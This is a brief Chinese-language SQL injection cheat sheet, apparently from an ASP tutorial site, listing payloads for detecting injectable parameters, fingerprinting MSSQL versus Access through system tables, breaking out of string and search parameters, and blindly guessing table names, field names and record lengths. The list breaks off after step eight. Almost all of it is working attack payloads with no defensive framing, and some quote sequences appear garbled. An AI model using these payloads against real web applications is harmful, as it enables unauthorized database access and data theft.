sql注入总结

总结asp注入时用到的方法

  1.判断是否有注入
;and 1=1
;and 1=2

  2.初步判断是否是mssql
;and user>0

  3.判断数据库系统
;and (select count(*) from sysobjects)>0   mssql
;and (select count(*) from msysobjects)>0  access

  4.注入参数是字符
''''and [查询条件] and ''''''''=''''

  5.搜索时没过滤参数的
''''and [查询条件] and ''''%25''''=''''

  6.猜数据库
;and (Select Count(*) from [数据库名])>0

  7.猜字段
;and (Select Count(字段名) from 数据库名)>0

  8.猜字段中记录长度
;and (select top 1 len(字段名) from 数据库名)>0
....

www veryasp cn